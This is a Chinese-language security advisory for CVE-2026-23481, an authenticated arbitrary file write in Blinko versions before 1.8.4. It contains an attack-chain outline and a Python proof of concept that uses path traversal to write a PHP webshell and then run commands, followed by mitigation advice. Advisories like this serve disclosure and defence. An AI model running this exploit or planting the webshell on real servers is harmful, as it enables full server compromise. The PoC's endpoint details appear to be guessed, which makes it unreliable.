CVE-2026-23481 CVSS 6.5 中危

CVE-2026-23481 Blinko任意文件写入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-23481

漏洞类型

任意文件写入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Blinko

漏洞概述

Blinko是一个AI驱动的卡片笔记项目。在1.8.4版本之前，系统中存在一个经过身份验证的任意文件写入漏洞。该漏洞位于`saveAdditionalDevFile`功能中，允许低权限攻击者在无需用户交互的情况下通过网络向服务器写入任意文件。这可能导致系统完整性被严重破坏。官方已在1.8.4版本中修复了此问题，建议用户尽快升级。

技术细节

该漏洞核心在于Blinko项目在处理`saveAdditionalDevFile`功能时，未对用户输入的文件路径及内容进行严格的校验与过滤。根据CVSS向量分析，该漏洞利用难度低（AC:L），攻击者仅需具备低权限账号（PR:L）即可通过网络发起攻击（AV:N）。在利用过程中，攻击者无需诱导用户交互（UI:N），可直接构造恶意HTTP POST请求。通过篡改请求参数，攻击者能够控制文件写入的路径和内容，从而在服务器上实现任意文件写入。尽管漏洞未直接泄露敏感信息（C:N）或导致服务拒绝（A:N），但由于其对系统完整性的破坏性极大（I:H），攻击者可借此写入后门文件、修改系统配置或植入Webshell，进而获取服务器控制权，造成严重的安全风险。

攻击链分析

STEP 1

侦察与认证

攻击者识别Blinko应用实例，并使用获取的合法低权限账号进行登录，获取有效的Session或Token。

STEP 2

构造恶意请求

攻击者分析`saveAdditionalDevFile`接口，构造包含恶意文件路径（如Webshell路径）和文件内容的HTTP POST请求。

STEP 3

执行漏洞利用

攻击者将恶意请求发送至服务器，由于缺乏校验，服务器将攻击者指定的内容写入指定路径的文件中。

STEP 4

维持权限与控制

攻击者访问写入的恶意文件（如Webshell），执行系统命令，从而完全控制服务器，破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Blinko Authenticated Arbitrary File Write
# Date: 2026-03-23
# Exploit Author: Analyst
# Vendor Homepage: https://github.com/blinkospace/blinko
# Version: < 1.8.4

TARGET_URL = "http://target-ip"
USERNAME = "attacker"
PASSWORD = "password"

session = requests.Session()

# Step 1: Login to obtain authenticated session
login_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
login_resp = session.post(f"{TARGET_URL}/api/login", json=login_payload)
if login_resp.status_code != 200:
    print("Login failed")
    exit()

# Step 2: Trigger arbitrary file write via saveAdditionalDevFile
# The endpoint allows specifying path and content
exploit_payload = {
    "path": "../../var/www/html/shell.php", # Example path traversal
    "content": "<?php system($_GET['cmd']); ?>"
}

exploit_resp = session.post(f"{TARGET_URL}/api/saveAdditionalDevFile", json=exploit_payload)

if exploit_resp.status_code == 200:
    print("[+] File written successfully!")
    print(f"[+] Check your webshell at: {TARGET_URL}/shell.php?cmd=whoami")
else:
    print("[-] Exploit failed")

影响范围

Blinko < 1.8.4

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用`saveAdditionalDevFile`相关接口或在网络层限制对API的访问，同时加强对服务器文件系统的监控，防止未授权的文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表